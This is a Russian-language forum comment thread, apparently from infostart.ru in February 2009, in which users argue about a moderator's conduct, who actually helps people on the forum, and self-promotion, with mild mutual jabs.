86. Душелов 4021 12.02.09 19:29 Сейчас в теме
(85) Ладно, девочки, не ссортьесь! :))))))))))
87. Altair777 645 12.02.09 19:40 Сейчас в теме
(85) зато ты нифика не делаешь как модератор.
А используешь свои права в корыстных целях. Когда это тебе выгодно.
Шутить я позволяю. Друзьям. А не известно кому неизвестно из какого небытия вылезшим.
Да и мне по бубну. Что этот срач (с подачи Дрока), поднялся именно здесь.
Так как статейка ниочем. О тупом админе, который не умеет использовать политики безопасности.

P.S. Я хотел прекратить (см 83). Но мне не дали.
P.P.S. (85) я мог бы еще детальнее разобрать, но не вижу смысла.
88. O-Planet 6444 12.02.09 19:47 Сейчас в теме
(87) А ты спросил, есть ли у модераторов возможность чистить здесь сообщения? Очень бы оно не помешало. Статью можешь считать ниачем.
91. Altair777 645 12.02.09 19:54 Сейчас в теме
(88) > А ты спросил, есть ли у модераторов возможность чистить здесь сообщения?

еще раз повторяю (см.83). Я просил не Модера, а Админа
90. Altair777 645 12.02.09 19:52 Сейчас в теме
(85) > Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой

Я "придирался" к:
1) fixin - no comment
2) LenaTorpeda - забанен
3) vacancy9 - забанен
4) wictorovichvadim (примерно кажется так) - забанен
5) toypaul - еще здесь :-)
6) ukrandruha - забанен

кого-то упустил?
92. O-Planet 6444 12.02.09 20:00 Сейчас в теме
95. Altair777 645 12.02.09 20:08 Сейчас в теме
(92)
Это твое право. Но не обязанность. Обязанности у тебя другие. А, то что ты их не выполняешь - конечно, не может быть предметом гордости.

Скольким людям за последний месяц-два ты помог на форуме?
Лично я - немногим, хотя и старался. А ты хоть кому-то?
имхо, больше всех - Ёпрст.
96. O-Planet 6444 12.02.09 20:18 Сейчас в теме
(95) Да не люблю я подсчитывать. И ко мне больше в личку обращаются, также пишут на сайт. Да и по-разному мы с тобой понимаем помощь. Я - вот так: http://infostart.ru/projects/445/ . А ты, похоже, как в (90) :))
97. CheBurator 2684 12.02.09 20:25 Сейчас в теме
(96) хватить пиарить шпингалеты!!!!
Altair777; +1 Ответить
98. Altair777 645 12.02.09 20:28 Сейчас в теме
(96)
> Да не люблю я подсчитывать.
Я задал простой вопрос. Про твою помощь на форуме.
Скольким? Порядок хотя бы назови. 0?

> А ты, похоже, как в (90) :))
Это твое субъективное мнение.

> И ко мне больше в личку обращаются
А ко мне не только в личку тут, на ИС пишут, но еще и в аську.
И я никому не отказал. Вот вчера буквально задали мне вопрос, на который я не смог ответить. И я обратился за помощью к своему знакомому.
Но я все это не выставляю напоказ и не самопиарю, как ты сделал в (96).
99. O-Planet 6444 12.02.09 20:30 Сейчас в теме
(98) >> Но я все это не выставляю напоказ
Угу ))

А в 90 я просто "ответил на твой простой вопрос". Чем помощь на форуме лучше помощи в разделе "Программы"?
100. Altair777 645 12.02.09 20:32 Сейчас в теме
(99)
> А в 90 я просто "ответил на твой простой вопрос"

Прицел сбился? 90 - это мой пост.
101. O-Planet 6444 12.02.09 20:44 Сейчас в теме
102. Altair777 645 12.02.09 20:46 Сейчас в теме
105. poppy 12.02.09 21:13 Сейчас в теме
(90)
Хорошими делами прославиться нельзя? (с) Шапокляк. ;-)

З.Ы. Лоха забыл.
107. Altair777 645 12.02.09 21:16 Сейчас в теме
(105) Спасибо, милая.
Еще ЛохНесс, но я его так... слегка зацепил.
Оставьте свое сообщение